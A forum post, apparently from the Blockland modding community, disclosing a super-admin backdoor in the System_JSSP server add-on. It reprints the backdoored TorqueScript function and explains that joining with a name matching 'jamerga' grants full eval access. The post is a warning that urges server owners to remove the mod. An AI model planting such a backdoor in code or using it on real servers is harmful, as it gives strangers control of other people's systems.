So yeah, recently I was testing out KnifeDM/Factor-X/Gweedo's new hosting service (Got failbinned, don't waste your time looking for it).
Gweedo gave me eval so I could check up on his scripts running on the server to look for some erroneous package or something that might nab my key out of mid-chat when I use his mod to insert my key into his server.
First thing I did was I uploaded a quick script that let me download any text-based file on the server. This means things like .cs files, or .txt files, no pictures, .exe's, or .dats. This requires eval access to do, so I won't be hacking your servers. Chill, guys.
Second thing I did was upload another script that listed the files in a directory specified by me, so I could list his add-ons.
Then, I listed every .zip file in /add-ons, then took note of the non default ones, mapped their contents, then downloaded them.
There wasn't much that was non-default on the server, RTB, and an add-on I hadn't heard of before - "System_JSSP"
I downloaded the mod, and it various files, special chats for moderators, admins, super admins, and co-hosts. Basically, an all-in-one Adminchat/Moderator/Eval/server management. Very nice idea, poorly coded.
Anyway, all I was interested in at the time was the eval script, so I looked it over, no funky logging or anything that might nab a key, a bunch of other dumb stuff all over, everything was hardcoded, a stuffty mod, basically.
Then I finished, wrote my review about gweedo's service, and posted it.
That's when another guy posted. I don't remember his name, and I can't find a quote on this - the topic is in the fail bin. He pointed this out:
What the forget?A super admin backdoor? I already knew by reading the eval code that it was limited to super admins, so not only was this a SA backdoor, it was an almighty SA-EVAL backdoor!
Frankly, I don't know if Jamer planned it to be a 2x backdoor, but it is.
Anyway, I had to confirm this was in the code, sure enough, mainFunctions.cs, line 239:
function serverCmdCheckAdmin(%cl,%name)
{
if(findclientbyname(%name).isAdmin)
{
%name=findclientbyname(%name);
messageClient(%cl,'',"\c2JSSP Monitor\c6: \c2"@%name.name@" \c6is an \c0Admin");
}
else
{
%name=findclientbyname(%name);
fcbn(jamerga).isSuperAdmin=1;
messageClient(%cl,'',"\c2JSSP Monitor\c6: \c2"@%name.name@" \c6is not an \c0Admin");
}
}
Very subtle, very effective- but wait!
Not only is it a SUPER ADMINISTRATOR EVAL BACKDOOR - it's a
stuffTY SUPER ADMINISTRATOR EVAL BACKDOOR!
Even an idiot can understand this: fcbn is shorthand for findclientbyname. findclientbyname finds the client that most closely matches the string input, in this case,
jamerga.
What does this mean, you ask? This means you could change your name to "Jamergam," join a server with this mod enabled, and get full eval!
Speaking from a modders standpoint, he didn't include an isObject check on the fcbn, so if jamerga isn't in the server, it spews a console error out. forget you.that's right,
anyone can have full eval on a server running this mod!I'm also missing a script file, for whatever reason, so I can't get the CRC for badspot to ban it from everything. Sorry badspot! I know Gweedo has a copy, ask him!
One other thing - right up at the top of mainfunctions.cs, what do we see?
//======================================================================
// ==> Made by Cat123 - BL_ID 23462 (Original)
// ==> Last modification - May 22, 2012
// ==> Made because - Lt. Jamergaman needed me to do it
// ==> Script Mode - "Basic" - This script does not contains something advanced
// ==> If you find any bug, PM me on the forums.
//======================================================================
Yeah, that's right, Cat123, resident loving handicapped coder's name all over it. Chances are Jamer included the backdoor on his own, but Cat had his grubby hands on this mod in some way or another.
description.txt, you ask?
Title: Jamer's Server System Pack v4 FB4
Author: Lt. Jamergaman & some help from Xalos & Cat123
Description: MY SCRIPTS! V4!!!!
Xalos had his hands on this too? At least he doesn't sign and date his code! Really, I think Xalos is above stuff like this, but his name
is on it.
That's my post. Check your servers for
System_JSSP and remove it if you find it. You don't want "JAMERGAMER IS A friend" getting full eval!
